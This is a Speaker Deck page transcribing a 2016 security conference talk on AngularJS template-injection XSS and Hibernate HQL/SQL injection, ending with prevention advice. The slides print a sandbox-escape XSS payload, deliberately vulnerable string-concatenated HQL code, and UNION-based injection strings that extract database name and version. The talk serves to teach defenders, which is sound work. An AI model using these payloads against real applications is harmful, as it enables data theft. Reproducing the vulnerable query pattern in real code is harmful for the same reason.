Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Advanced XSS and Injection Attacks

Casey Dunham
May 21, 2016
Programming
1
1.1k

Advanced XSS and Injection Attacks

Presentation on XSS in AngularJS and Hibernate SQL Injection given at Security BSides Boston 2016.

Links to the demo application:

https://github.com/caseydunham/angularjs-sandbox
https://github.com/caseydunham/hibernate-sandbox

Casey Dunham

May 21, 2016
Tweet

More Decks by Casey Dunham

See All by Casey Dunham
Hibernate Blind SQLi MISC 2016
caseydunham
0
490
Using OSINT to Attack Web Applications
caseydunham
2
210

Other Decks in Programming

See All in Programming
try! Swift Tokyo 初参加報告LT
hinakko2
0
180
DDDはなぜ難しいのか / 良いコードの定義と設計能力の壁
pospome
28
10k
pixivアプリでマルチモジュールを実現するまで
gatosyocora
1
130
チーム力を高めるスクラム実践法:カンバン公開と課題攻略について - ニフティのスクラムトーク Vol. 2 - NIFTY Tech Talk #18
niftycorp
PRO
1
110
脱・初心者!脱・マネコン!AWS CDKを使ってみませんか!?
har1101
0
300
プールにゆこう
irof
2
120
Rubyでたのしむクリエイティブコーディング/Enjoy Creative coding with Ruby
chobishiba
1
160
今、知っておきたい! 生成AIエージェントの世界
elith
3
330
1인 개발자로 행복하게 살기 - GDG 송도 헬로월드 2024
benjaminkim
1
5.6k
object-oriented-conference-2024
fuwasegu
8
2.7k
Front-end application development, Symfony-style(s)
dunglas
2
1.9k
今の SmartHR にエンジニアで入社するとどうなるの?
daisukeshinoku
5
4.6k

Featured

See All Featured
Happy Clients
brianwarren
91
6.4k
Bootstrapping a Software Product
garrettdimon
PRO
301
110k
Facilitating Awesome Meetings
lara
40
5.6k
A Philosophy of Restraint
colly
195
16k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
352
28k
Fantastic passwords and where to find them - at NoRuKo
philnash
36
2.5k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
34
8.8k
Raft: Consensus for Rubyists
vanstee
131
6.2k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
226
16k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
6
990
How To Stay Up To Date on Web Technology
chriscoyier
781
250k
Building an army of robots
kneath
300
41k

Transcript

  1. Advanced XSS and Injection Attacks

  2. Agenda • Introduction • AngularJS Expressions • AngularJS XSS •

    HQL SQLi • Prevention • Q + A

  3. Introduction • Casey Dunham • Security Consultant for GuidePoint Security

    • Application Security • Code Reviews • Assessments • OWASP Maine • DC207 • TOOOL @CaseyDunham @GuidePointSec

  4. AngularJS Expressions

  5. None

  6. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong class="price">{{ product.price | currency }}</strong> <button type="button" ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  7. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  8. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  9. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  10. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  11. <!doctype html> <html lang="en" ng-app="app"> <body> <div ng-repeat="product in vm.featuredProducts">

    <h2>{{ product.name }}</h2> <strong>{{ product.price | currency }}</strong> <button ng-click="vm.addToCart(product.id)">Add to Cart</button> <img ng-src="{{ product.imageUrl }}"/> </div> <script src="/webjars/angularjs/1.4.9/angular.js"></script> <script src="/webjars/angularjs/1.4.9/angular-route.js"></script> ... </body> </html>

  12. •Evaluated against a scope object •Evaluation is forgiving to undefined

    and null •Filters can be used to format data before displaying it •No Control Flow Statements •No Function Declarations •No RegExp Creation With Literal Notation •No Object Creation With New Operator •No Bitwise, Comma, And Void Operators Versus JavaScript Expressions

  13. AngularJS XSS

  14. • Gareth Heyes (PortSwigger) • XSS without HTML: Client-Side Template

    Injection with AngularJS • http://blog.portswigger.net/2016/01/xss-without- html-client-side-template.html Prior Research

  15. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }} Sandbox Escape

  16. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  17. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  18. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  19. {{ 'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//‘); }}

  20. DEMO

  21. Hibernate Overview

  22. • Mikhail Egorov / Sergey Soldatov • ORM2Pwn: Exploiting Injections

    in hibernate ORM • Zeronights 0x05 • New Methods for Exploiting ORM Injections in Java Applications • HITB 2016 (Later this May) Prior Research

  23. • Renaud Dubourguais • HQL : Hyperinsane Query Language •

    Safety Symposium on Information and Communication Technologies (SSTIC) 2015

  24. “Hibernate ORM (Hibernate in short) is an object-relational mapping framework

    for the Java language. It provides a framework for mapping an object-oriented domain model to a relational database.” - Wikipedia

  25. “Hibernate's primary feature is mapping from Java classes to database

    tables; and mapping from Java data types to SQL data types.” - Wikipedia
  26. None

  27. public class Customer { private Long id; private String name;

    private String accountId; public Long getId() { return id; } public void setId(Long id) { this.id = id; } … } id name account_id 1 acme acme_123 2 abc abc_789 3 xyz xyz_3843

  28. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  29. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  30. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  31. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  32. String sql = "SELECT id, name, account_id FROM Customers WHERE

    account_id = ?”; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, “acme_123”); ResultSet rs = stmt.executeQuery(); Customer c = new Customer(); if (rs.next()) { long id = rs.getLong("id"); c.setId(id); String name = rs.getString("name"); c.setName(name); String accountId = rs.getString("account_id"); c.setAccountId(accountId); }

  33. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  34. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  35. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  36. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  37. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  38. @Entity @Table(name=“customer”) public class Customer { @Id @GeneratedValue( strategy=GenerationType.IDENTITY )

    private Long id; @Column( name=“name”, nullable=false ) private String name; @Column( name=“account_id”, nullable=false ) private String accountId; … } id name account_id 1 acme acme_123 2 abc abc_789 3 xyz xyz_3843

  39. Exploiting HQL Queries

  40. • Similar to SQL • Fully Object Oriented • Uses

    mapped objects and their properties • More limited than SQL Hibernate Query Language

  41. from Customer c where c.accountId = ‘acme_123’ Mapped Object Object

    Property Object Alias

  42. Can Still Be Vulnerable To Injection public List<Customer> findAllCustomersLike(String query)

    { Session session = getSession(); String hql = "from Customer c where c.name like '%" + query + “%'"; Query q = session.createQuery(hql); return (List<Customer>) q.list(); }

  43. Can Still Be Vulnerable To Injection public List<Customer> findAllCustomersLike(String query)

    { Session session = getSession(); String hql = "from Customer c where c.name like '%" + query + “%'"; Query q = session.createQuery(hql); return (List<Customer>) q.list(); }
  44. None
  45. None

  46. Let’s Fix Our Injection String hql = "from Customer c

    where c.name like '%" + query + “%'";

  47. Let’s Fix Our Injection String query = "' or 1=1

    or ''='"; String hql = "from Customer c where c.name like '%" + query + “%'";

  48. Let’s Fix Our Injection String hql = "from Customer c

    where c.name like '%" + "' or 1=1 or ''='" + "%'";

  49. Success!

  50. • Enumerate other columns (properties)? • Access other mapped objects?

    So Now What?

  51. Screw that and let’s just get to the fun stuff.

  52. Blind SQLi

  53. HQL Injection SQL Injection

  54. Escaping HQL • In HQL the \ is a valid

    character • In HQL to escape a ' we use ‘' • Can combine these to pass along our SQL Injection through HQL
  55. None

  56. Success! • We can now continue along with a normal

    SQL Injection • But… • SQL needs to be Valid • HQL needs to be Valid as well

  57. Here’s where it gets tricky

  58. String hql = "from Customer c where c.name like '%"

    + query + "%'"; Injection Here

  59. http://localhost/search?q=test

  60. q=test' and 1='1

  61. None

  62. q=test' and '1\''=1 -- '='1

  63. q=test' and '1\''=1 union select 1,database(),3-- '='1

  64. None

  65. q=test' and '1\''=1 union select 1,database(),version()— '='1

  66. w00t!

  67. select customer0_.id as id1_0_, customer0_.account_id as account_2_0_, customer0_.name as name3_0_

    from customers customer0_ where ( customer0_.name like '%test' ) and '1\''=1 union select 1,database(),version()— '='1%'

  68. Prevention

  69. Prevention is the same as all SQL Injection

  70. Don’t use String Concatenation To Build Queries!!

  71. String accountId = request.getParameter(“accountId”); String hql = "from Customer c

    where c.accountId = :accountId”; Query query = session.createQuery(hql); query.setString("accountId", accountId); Customer c = (Customer) query.uniqueResult();

  72. • Look for calls to • createQuery • createSQLQuery •

    All take HQL strings that could have potential for Injection.

  73. Q + A

  74. Thank You!

  75. @CaseyDunham